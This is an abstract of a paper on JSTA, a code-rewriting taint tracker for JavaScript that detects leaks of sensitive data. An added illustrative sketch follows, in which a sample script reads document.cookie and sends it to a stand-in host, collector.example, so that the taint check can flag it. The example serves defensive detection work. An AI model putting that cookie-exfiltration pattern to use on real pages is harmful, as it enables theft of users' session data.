With the rapid development of Web technology, JavaScript is used ever more widely, especially in Web applications that aim for fast, timely responses, and this has given rise to many security problems. This paper proposes JSTA, a dynamic taint tracking method for JavaScript based on code rewriting. By rewriting JavaScript code, JSTA makes the rewritten code mark sensitive data as tainted and track it during execution, so that sensitive data leakage is detected promptly and an alert is raised. Unlike previous work, JSTA is implemented independently of the JavaScript engine and can be applied to multiple browsers. Test results show that JSTA effectively tracks sensitive data and detects sensitive data leakage.
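A minimal sketch of the approach the abstract describes, added here as an illustration and not taken from JSTA or the paper: rewritten code calls runtime helpers that label sensitive data at the source, propagate labels through operations, and raise an alert at a sink. The helper names (`Tainted`, `__source`, `__add`, `__call`, `__sink`), the sample script, the `netSend` stand-in and the `collector.example` URL are all assumptions, and the rewritten form is written by hand rather than produced by a rewriter.

```javascript
// Added illustration, not JSTA's code. All helper names below are hypothetical.
const alerts = [];

// A tainted value carries its data plus the labels of the sources it derives from.
class Tainted {
  constructor(value, labels) { this.value = value; this.labels = new Set(labels); }
}
const raw = (v) => (v instanceof Tainted ? v.value : v);
const labelsOf = (...vs) => vs.flatMap((v) => (v instanceof Tainted ? [...v.labels] : []));
const wrap = (value, labels) => (labels.length ? new Tainted(value, labels) : value);

// Source: a read of sensitive data is rewritten into a labelled read.
const __source = (value, label) => new Tainted(value, [label]);
// Propagation: `a + b` is rewritten to `__add(a, b)`; the result inherits both operands' labels.
const __add = (a, b) => wrap(raw(a) + raw(b), labelsOf(a, b));
// Propagation through a built-in call: `f(x)` is rewritten to `__call(f, x)`.
const __call = (fn, ...args) => wrap(fn(...args.map(raw)), labelsOf(...args));
// Sink: an outbound send is rewritten to pass through a check that records an alert.
function __sink(name, send, arg) {
  const labels = [...new Set(labelsOf(arg))];
  if (labels.length) alerts.push({ sink: name, labels });
  return send(raw(arg));
}

// Original page script (constructed sample):
//   var c = document.cookie;
//   var url = "https://collector.example/?d=" + encodeURIComponent(c);
//   netSend(url);
//   netSend("https://collector.example/ping");
// The same script after rewriting, with a stand-in for the browser's network call:
function runRewritten(cookieValue) {
  alerts.length = 0;
  const sent = [];
  const netSend = (u) => sent.push(u);
  const c = __source(cookieValue, "document.cookie");
  const url = __add("https://collector.example/?d=", __call(encodeURIComponent, c));
  __sink("netSend", netSend, url);                               // tainted: alert recorded
  __sink("netSend", netSend, "https://collector.example/ping");  // untainted: no alert
  return { sent, alerts: [...alerts] };
}
```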